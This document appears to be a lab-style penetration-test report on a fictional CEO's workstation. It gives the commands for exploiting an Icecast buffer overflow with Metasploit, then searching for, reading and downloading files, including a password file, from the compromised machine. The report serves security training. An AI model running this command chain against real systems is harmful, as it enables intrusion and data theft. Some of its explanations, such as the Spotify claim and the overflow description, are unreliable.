29 March 2022
GoodSecurity was tasked with performing an internal penetration test on GoodCorp’s CEO, Hans Gruber. An internal penetration test is a dedicated attack against internally connected systems. The goal of this test is to perform attacks similar to those of a hacker and attempt to infiltrate Hans’ computer to determine if it is at risk. GoodSecurity’s overall objective was to exploit any vulnerable software, find a secret recipe file on Hans’ computer, and report the findings back to GoodCorp. The internal penetration test found several alarming vulnerabilities on Hans’ computer: When performing the attacks, GoodSecurity was able to gain access to his machine and find the secret recipe file by exploiting two programs with major vulnerabilities. The details of the attack are below.
-
Machine IP:
- Machine’s IP address =
192.168.0.20
- Machine’s IP address =
-
Hostname:
- Actual name of the machine =
MSEDGEWIN10
- Actual name of the machine =
-
Vulnerability Exploited:
- The name of the script or Metasploit module used:
The exploit/windows/http/icecast_headerallows an attacker or threat actor to gain remote control of a victims system by exploiting a buffer overflow which overwrites the memory on the vicitms system using the "icecast" flaw. The flaw allows for writing past the end of a pointer array when receiving information greater than 32 characters (headers).
- The name of the script or Metasploit module used:
-
Vulnerability Explanation:
- If you use audio streaming services like
Spotifythen you've usedIcecast.It is a streaming media server used by radio stations, online music streaming and other similar platforms that allow you to create list of your favorite music and listen to it anywhere at anytime. TheIcecast Flawis used by attackers and or threat actors to inject malicious code into theIcecastoverflow buffer. TheIcecastserver has a maximum set of 32 characters in the client's HTTP request. If the request is longer than 32 characters (aka headers) then the excess is sent to the stack overflow where it fills the buffers allocated for the overflow. In this process of buffer overflow is something called anExtended Instruction Pointer (EIP)that holds the memory address of the next instruction to execute in the buffer overflow. It is in theEIPthat an attack is able to be executed. Once the overflow fills the buffers allocated it overwrites theEIPaddress space. If it overwrites with a newreturn pointerit can tell the CPU to go to an address which containsinstruction codewhich will then be executed. It is here where a malicious code or unwanted process can be executed by an attacker.
- If you use audio streaming services like
Click Here For Full Extract On Information Above
Severity: In your expert opinion, how severe is this vulnerability?
The severity of this attack according to CVE was scored at 7.5 highlighting that the compromise of confidentiality, integrity and availabitlity is considerable.
After receiving written permission from GoodCorp Inc. a security test was ran against the CEO's workstation. The following highlights the steps taken to complete the test and the vulnerabilities found during testing.
A service and version scan was ran first using nmap to determine the service and version running on the system. The scan was specifically looking to see if a version of Icecast was running on the network.
- Command used:
nmap -sV 192.168.0.20- nmap = network scanner
- -sV = specification to run a service and version scan
- 192.168.0.20 = target the scan is being ran against (The CEO's workstation IP address)
Above you can see that the Icecast service was running on the machine as well as what version was running. The next step was to search for any Icecast exploits on the machine.
- Command used:
searchsploit icecast- searchsploit = security assessment tool for searching offline repositories
- icecast = exploit/s being searched for
Above you can see there are multiple Icecast exploits available.
Next, penetration testing software called Metasploit was used to continue testing. The two images below demonstrate the ability to load and use Metasploit to find Icecast module/s to use against the target.
- Command To Start Metasploit:
msfconsole - Command To Search For Module:
search icecast
A more generic search focused on the word cast was also ran to compare results of the search (see below):
- Command To Search For Just 'cast':
search cast
- Module Found In Both Searches =
/exploit/windows/http/icecast_header
To load the module for exploit you can use the entire path of the module found or you can use the number in front of the module as can be seen in image above.
- Command To Use Entire Path Module =
use /exploit/windows/http/icecast_header - Command Using Just Number =
use 23
Before running the exloit the receiving host of the exploit needs to be set.
- Command To Set RHOST =
set RHOST 192.168.0.20- The receiving host or RHOST is the CEO's IP Address
After setting the RHOST the exploit was run (see below).
- Command To Run The Icecast Exploit =
exploit
As can be seen above the exploit was successful and an open session was established with the target, the CEO's workstation.
The next part of the security test was to see if files that contain the strings recipe or secretfile could be found.
- Command To Search For
secretText File =search -f *secret*.txt- search = command to run a search
- -f = indicates that the search is for a file
- secret.txt = indicate to search all text files containing the word
secret
As can be seen above the command was successful in finding a file with secretfile.txt and revealed the path to the file.
- Command To Search For
recipeText File =search -f *recipe*.txt- search = command to run a search
- -f = indicates that the search is for a file
- recipe.txt = indicate to search all text files containing the word
recipe
Again, the search was successful in finding a file containing the word recipe as well as the path to the file.
From root directory we changed into the directory where the Drinks.recipe.txt was found.
Once in the directory we read the contents of the file.
- Command To Open & Read File =
cat Drinks.recipe.txt(see results below)
Taking the security testing further we were able to exfiltrate the Drinks.recipe.text and download it from the CEO's workstation back to the attacker machine.
- Command To Exfiltrate & Download Recipe =
download 'c:\Users\IEUser\Documents\Drinks.recipe.txt'
The file was successfully stolen from the CEO's computer as can be seen above.
To solidify the legitimacy of the security testing and highlight the vulnerabilities found additional security testing was ran against the CEO's workstation.
- It should be noted that no other IP addresses were exploited and no changes were made to files or the configuration of the CEO's workstation during this testing.
The find other possible exploits the local workstation was searched:
- Command To Use Exploit Suggester =
run post/multi/recon/local_exploit_suggestor
Two additional vulnerabilties were found using this command as can be seen above but were not run against the CEO's workstation. The reason the vulnerabilites were not exploited is because instructions for this security test explicitly stated that no configuration changes to the workstation would be allowed and both exploits attempt to make some level of change to those types of settings.
- Click Here for additional information about
exploit/windows/local/ms16_075_refelctionas known asCVE-2016-3225 - Click Here for additional information about
exploit/windows/local/ikeext_service
The directory path for both the Drinks.recipe.txt and User.secretfile.txt revealed other sensitive files that were able to be exploited as well to include a password file.
- Command To See Files In Current Directory = `ls`
- Command To See Contents Of File = `cat password.txt`
- Command To Enumerate All Logged In Users = `run post/windows/gather/enum_logged_on_users`
- Command To Open A Meterpreter Shell = `shell`
- Command To Display Target Computer System Information From c:\Users\IEUser\Documents directory = `systeminfo`
- Update to Icecast 2.0.2 or later
- Revisit password policies and provide training on how to create complex passwords that would be difficult to break
- Consider additional security testing and adding
Security HTTP Headersto prevent vulnerabilities